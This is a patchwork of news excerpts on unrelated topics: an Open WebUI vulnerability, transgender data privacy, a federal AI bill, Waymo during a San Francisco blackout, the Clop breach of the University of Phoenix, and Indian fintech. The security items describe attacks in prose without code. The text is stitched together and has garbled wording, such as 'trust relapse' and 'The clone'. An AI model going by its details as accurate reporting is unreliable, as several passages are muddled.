Talking about WebUI, Cato researchers said, “When a platform of this size becomes vulnerable, the impact isn’t just theoretical. It affects production environments managing research data, internal codebases, and regulated information.”
The flaw is tracked as CVE-2025-64496 and found by Cato Networks experts. The vulnerability affects Open WebUI versions 0.6.34 and older if the Director Connection feature is allowed. The flaw has a severity rating of 7.3 out of 10.
The vulnerability exists inside Direct Connections, which allows users to connect Open WebUI to external OpenAI-supported model servers. While built for supporting flexibility and self-hosted AI workflows, the feature can be exploited if a user is tricked into linking with a malicious server pretending to be a genuine AI endpoint.
Fundamentally, the vulnerability comes from a trust relapse between unsafe model servers and the user's browser session. A malicious server can send a tailored server-sent events message that prompts the deployment of JavaScript code in the browser. This lets a threat actor steal authentication tokens stored in local storage. When the hacker gets these tokens, it gives them full access to the user's Open WebUI account. Chats, API keys, uploaded documents, and other important data is exposed.
Depending on user privileges, the consequences can be different.
Open WebUI maintainers were informed about the issue in October 2025, and publicly disclosed in November 2025, after patch validation and CVE assignment. Open WebUI variants 0.6.35 and later stop the compromised execute events, patching the user-facing threat.
Open WebUI’s security patch will work for v0.6.35 or “newer versions, which closes the user-facing Direct Connections vulnerability. However, organizations still need to strengthen authentication, sandbox extensibility and restrict access to specific resources,” according to Cato Networks researchers.
The contemporary legal and administrative actions in the United States are revamping how personal data is recorded, shared, and accessed by government systems. For transgender and gender diverse individuals, these changes carry heightened risks, as identity records and healthcare information are increasingly entangled with political and legal enforcement mechanisms.
One of the most visible shifts involves federal identity documentation. Updated rules now require U.S. passport applicants to list sex as assigned at birth, eliminating earlier flexibility in gender markers. Courts have allowed this policy to proceed despite legal challenges. Passport data does not function in isolation. It feeds into airline systems, border controls, employment verification processes, financial services, and law enforcement databases. When official identification does not reflect an individual’s lived identity, transgender and gender diverse people may face repeated scrutiny, increased risk of harassment, and complications during travel or routine identity checks. From a data governance perspective, embedding such inconsistencies also weakens the accuracy and reliability of federal record systems.
Healthcare data has become another major point of concern. The Department of Justice has expanded investigations into medical providers offering gender related care to minors by applying existing fraud and drug regulation laws. These investigations focus on insurance billing practices, particularly the use of diagnostic codes to secure coverage for treatments. As part of these efforts, subpoenas have been issued to hospitals and clinics across the country.
Importantly, these subpoenas have sought not only financial records but also deeply sensitive patient information, including names, birth dates, and medical intake forms. Although current health privacy laws permit disclosures for law enforcement purposes, privacy experts warn that this exception allows personal medical data to be accessed and retained far beyond its original purpose. Many healthcare providers report that these actions have created a chilling effect, prompting some institutions to restrict or suspend gender related care due to legal uncertainty.
Other federal agencies have taken steps that further intensify concern. The Federal Trade Commission, traditionally focused on consumer protection and data privacy, has hosted events scrutinizing gender affirming healthcare while giving limited attention to patient confidentiality. This shift has raised questions about how privacy enforcement priorities are being set.
As in person healthcare becomes harder to access, transgender and gender diverse individuals increasingly depend on digital resources. Research consistently shows that the vast majority of transgender adults rely on the internet for health information, and a large proportion use telehealth services for medical care. However, this dependence on digital systems also exposes vulnerabilities, including limited broadband access, high device costs, and gaps in digital literacy. These risks are compounded by the government’s routine purchase of personal data from commercial data brokers.
Privacy challenges extend into educational systems as well. Courts have declined to establish a national standard governing control over students’ gender related data, leaving unresolved questions about who can access, store, and disclose sensitive information held by schools.
Taken together, changes to identity documents, aggressive access to healthcare data, and unresolved data protections in education are creating an environment of increased surveillance for transgender and gender diverse individuals. While some state level actions have successfully limited overly broad data requests, experts argue that comprehensive federal privacy protections are urgently needed to safeguard sensitive personal data in an increasingly digital society.
Beside this, the proposal will create a federal right for users to sue companies for misusing their personal data for AI model training without proper consent. The proposal allows statutory and punitive damages, attorney fees and injunctions.
Blackburn is planning to officially introduce the bill this year to codify President Donald Trump’s push for “one federal rule book” for AI, according to the press release.
The legislative framework comes on the heels of Trump’s signing of an executive order aimed at blocking “onerous” AI laws at the state level and promoting a national policy framework for the technology.
In order to ensure that there is a least burdensome national standard rather than fifty inconsistent State ones, the directive required the administration to collaborate with Congress.
Michael Kratsios, the president's science and technology adviser, and David Sacks, the White House special adviser for AI and cryptocurrency, were instructed by the president to jointly propose federal AI legislation that would supersede any state laws that would contradict with administration policy.
Blackburn stated in the Friday release that rather than advocating for AI amnesty, President Trump correctly urged Congress to enact federal standards and protections to address the patchwork of state laws that have impeded AI advancement.
The proposal will preempt state laws regulating the management of catastrophic AI risks. The legislation will also mostly “preempt” state laws for digital replicas to make a national standard for AI.
The proposal will not preempt “any generally applicable law, including a body of common law or a scheme of sectoral governance that may address” AI. The bill becomes effective 180 days after enforcement.
A large power outage across San Francisco during the weekend disrupted daily life in the city and temporarily halted the operations of Waymo’s self-driving taxi service. The outage occurred on Saturday afternoon after a fire caused serious damage at a local electrical substation, according to utility provider Pacific Gas and Electric Company. As a result, electricity was cut off for more than 100,000 customers across multiple neighborhoods.
The loss of power affected more than homes and businesses. Several traffic signals across the city stopped functioning, creating confusion and congestion on major roads. During this period, multiple Waymo robotaxis were seen stopping in the middle of streets and intersections. Videos shared online showed the autonomous vehicles remaining stationary with their hazard lights turned on, while human drivers attempted to maneuver around them, leading to traffic bottlenecks in some areas.
Waymo confirmed that it temporarily paused all robotaxi services in the Bay Area as the outage unfolded. The company explained that its autonomous driving system is designed to treat non-working traffic lights as four-way stops, a standard safety approach used by human drivers as well. However, officials said the unusually widespread nature of the outage made conditions more complex than usual. In some cases, Waymo vehicles waited longer than expected at intersections to verify traffic conditions, which contributed to delays during peak congestion.
City authorities took emergency measures to manage the situation. Police officers, firefighters, and other personnel were deployed to direct traffic manually at critical intersections. Public transportation services were also affected, with some commuter train lines and stations experiencing temporary shutdowns due to the power failure.
Waymo stated that it remained in contact with city officials throughout the disruption and prioritized safety during the incident. The company said most rides that were already in progress were completed successfully, while other vehicles were either safely pulled over or returned to depots once service was suspended.
By Sunday afternoon, PG&E reported that power had been restored to the majority of affected customers, although thousands were still waiting for electricity to return. The utility provider said full restoration was expected by Monday.
Following the restoration of power, Waymo confirmed that its ride-hailing services in San Francisco had resumed. The company also indicated that it would review the incident to improve how its autonomous systems respond during large-scale infrastructure failures.
Waymo operates self-driving taxi services in several U.S. cities, including Los Angeles, Phoenix, Austin, and parts of Texas, and plans further expansion. The San Francisco outage has renewed discussions about how autonomous vehicles should adapt during emergencies, particularly when critical urban infrastructure fails.
It was orchestrated by the Clop ransomware group, a highly motivated cybercriminal syndicate that was well known for extorting large sums of money from their victims. During the attack, nearly 3.5 million individuals' personal records, such as those belonging to students, faculty, administrative staff, and third-party suppliers, were compromised, resulting in the compromise of the records.
Established in 1976, the university has grown over the last five decades into a major national educational provider. The university has enrolled approximately 82,700 students and is supported by a workforce of 3,400 employees.
Of these, nearly 2,300 are academics. This breach was officially confirmed by the institution through a written statement posted on its website on early December, while Phoenix Education Partners' parent organization, which filed a mandatory 8-K filing with the U.S. Securities and Exchange Commission, formally notified federal regulators of the incident in early December.
In this disclosure, the first authoritative acknowledgment of a breach that experts claim may have profound implications for identity protection, financial security, and institutional accountability within the higher education sector has been made. There is a substantial risk associated with critical enterprise software and delayed threat detection, highlighting how extensive the risks can be.
The breach at the University of Phoenix highlights this fact. The internal incident briefing indicates that the intrusion took place over a period of nine days between August 13 and August 22, 2025. The attackers took advantage of an unreported vulnerability in Oracle's E-Business Suite (EBS) - an important financial and administrative platform widely used by large organizations - to exploit the vulnerability.
During the course of this vulnerability, the threat actors were able to gain unauthorized access to highly sensitive information, which they then exfiltrated to 3,489,274 individuals, including students, alumni, students and professors, as well as external suppliers and service providers. The university did not find out about the compromise until November 21, 2025, more than three months after it occurred, even though it had begun unfolding in August.
According to reports, the discovery coincided with public signals from the Cl0p ransomware group, which had listed the institution on its leaked site, which had triggered its public detection. It has been reported that Phoenix Education Partners, the parent company of the university, formally disclosed the incident in a regulatory Form 8-K filing submitted to the U.S. Securities and Exchange Commission on December 2, 2025, followed by a broader public notification effort initiated on December 22 and 23 of the same year.
It is not unusual for sophisticated cyber intrusions to be detected in advance, but this delayed detection caused significant complications in the institution's response efforts because the institution's focus shifted from immediate containment to ensuring regulatory compliance, managing reputational risks, and ensuring identity protection for millions of people affected.
A comprehensive identity protection plan has been implemented by the University of Phoenix in response to the breach. This program offers a 12-month credit monitoring service, dark web surveillance service, identity theft recovery assistance, and an identity theft reimbursement policy that covers up to $1 million for those who have been affected by the breach.
The institution has not formally admitted liability for the incident, but there is strong evidence that it is part of a larger extortion campaign by the Clop ransomware group to take over the institution. A security analyst indicates Clop took advantage of a zero-day vulnerability (CVE-2025-61882) in Oracle's E-Business Suite in early August 2025, and that it has also been exploited in similar fashion to steal sensitive data from other prominent U.S universities, including Harvard University and the University of Pennsylvania, in both of whom confirmed that their students' and staff's personal records were accessed by an unauthorized third party using compromised Oracle systems.
The clone has a proven history of orchestrating mass data theft, including targeting various file transfer platforms, such as GoAnywhere, Accellion FTA, MOVEit, Cleo, and Gladinet CentreStack, as well as MFT platforms such as GoAnywhere. The Department of State has announced that a reward of up to $10 million will be offered to anyone who can identify a foreign government as the source of the ransomware collective's operations.
The resulting disruption has caused a number of disruptions in the business environment. In addition to the wave of incidents, other higher-education institutions have also been victimized by cyberattacks, which is a troubling pattern.
As a result of breaches involving voice phishing, some universities have revealed that their development, alumni, and administrative systems have been accessed unauthorized and donor and community information has been exfiltrated. Furthermore, this incident is similar to other recent instances of Oracle E-Business Suite (EBS) compromises across U.S. universities that have been reported.
These include Harvard University and the University of Pennsylvania, both of whom have admitted that unauthorized access was accessed to systems used to manage sensitive student and staff data. Among cybersecurity leaders, leadership notes the fact that universities are increasingly emulating the risk profile associated with sectors such as healthcare, characterized by centralized ecosystems housing large amounts of long-term personal data.
In a world where studies of student enrolment, financial aid records, payroll infrastructure and donor databases are all kept in the same place, a single point of compromise can reveal years and even decades of accumulated personal and financial information, compromising the unique culture of the institution.
Having large and long-standing repositories makes colleges unique targets for hacker attacks due to their scale and longevity, and because the impact of a breach of these repositories will be measured not only in terms of the loss of records, but in terms of the length of exposure as well as the size of the population exposed.
With this breach at University of Phoenix, an increasing body of evidence has emerged that U.S colleges and universities are constantly being victimized by an ever more coordinated wave of cyberattacks. There are recent disclosures from leading academic institutions, including Harvard University, the University of Pennsylvania, and Princeton University, that show that the threat landscape goes beyond ransomware operations, with voice-phishing campaigns also being used as a means to infiltrate systems that serve to facilitate alumni engagement and donor information sharing.
Among the many concerns raised by the developments, there are also concerns over the protection of institutional privacy. During an unusual public outrage, the U.S. Department of State has offered an unusual reward of $10 million for information that could link Clop's activities to foreign governments. This was a result of growing concerns within federal agencies that the ransomware groups may, in some cases, intersect with broader geopolitical strategies through their financial motivations.
University administrators and administrators have been reminded of the structural vulnerability associated with modern higher education because it highlights a reliance on sprawling, interconnected enterprise platforms that centralize academic, administrative, and financial operations, which creates an environment where the effects of a single breach can cascade across multiple stakeholder groups.
There has been a remarkable shift in attackers' priorities away from downright disrupting systems to covertly extracting and eradicating data. As a result, cybersecurity experts warn that breaches involving the theft of millions of records may no longer be outliers, but a foreseeable and recurring concern.
University institutions face two significant challenges that can be attributed to this trend-intensified regulatory scrutiny as well as the more intangible challenge of preserving trust among students, faculty, and staff whose personal information institutions are bound to protect ethically and contractually.
In light of the breach, the higher-education sector is experiencing a pivotal moment that is reinforcing the need for universities to evolve from open knowledge ecosystems to fortified digital enterprises, reinforcing concerns.
The use of identity protection support may be helpful in alleviating downstream damage, but cybersecurity experts are of the opinion that long-term resilience requires structural reform, rather than episodic responses.
The field of information security is moving towards layered defenses for legacy platforms, quicker patch cycles for vulnerabilities, and continuous network monitoring that is capable of identifying anomalous access patterns in real time, which is a key part of the process.
During crisis periods, it is important for policy analysts to emphasize the importance of institutional transparency, emphasizing the fact that early communication combined with clear remediation roadmaps provides a good opportunity to limit misinformation and recover stakeholder confidence.
In addition to technical safeguards, industry leaders advocate for expanded security awareness programs to improve institutional perimeters even as advanced tools are still being used to deal with threats like social engineering and phishing.
In this time of unprecedented digital access, in which data has become as valuable as degrees, universities face the challenge of safeguarding information, which is no longer a supplemental responsibility but a fundamental institutional mandate that will help determine the credibility, compliance, and trust that universities will rely on in years to come.
“We're already seeing traditional boundaries blur- payments, lending, embedded finance, and banking capabilities are coming closer together as players look to build more integrated and efficient models. While payments continue to be powerful for driving access and engagement, long-term value will come from combining scale with operational efficiency across the financial stack,” said Ramki Gaddapati, Co-Founder, APAC CEO and Global CTO, Zeta.
India’s fintech industry is preparing to enter 2026 with a new Artificial intelligence (AI) emerging as a critical tool in this transformation, helping firms strengthen fraud detection, streamline regulatory processes, and enhance customer trust.
According to Reserve Bank of India (RBI) data, digital payment volumes crossed 180 billion transactions in FY25, powered largely by the Unified Payments Interface (UPI) and embedded payment systems across commerce, mobility, and lending platforms.
Yet, regulators and industry leaders are increasingly concerned about operational risks and fraud. The RBI, along with the Bank for International Settlements (BIS), has highlighted vulnerabilities in digital payment ecosystems, urging fintechs to adopt stronger compliance frameworks. A
Artificial intelligence is set to play a central role in this compliance-first era. Fintech firms are deploying AI to:
Detect and prevent fraudulent transactions in real time
Automate compliance reporting and monitoring
Personalize customer experiences while maintaining data security
Analyze risk patterns across lending and investment platforms
The sector is also diversifying beyond payments. Fintechs are moving deeper into credit, wealth management, and banking-related services, areas that demand stricter oversight. It allows firms to capture new revenue streams and broaden their customer base but exposes them to heightened regulatory scrutiny and the need for more robust governance structures.
“The DPDP Act is important because it protects personal data and builds trust. Without compliance, organisations face penalties, data breaches, customer loss, and reputational damage. Following the law improves credibility, strengthens security, and ensures responsible data handling for sustained business growth,” said Neha Abbad, co-founder, CyberSigma Consulting.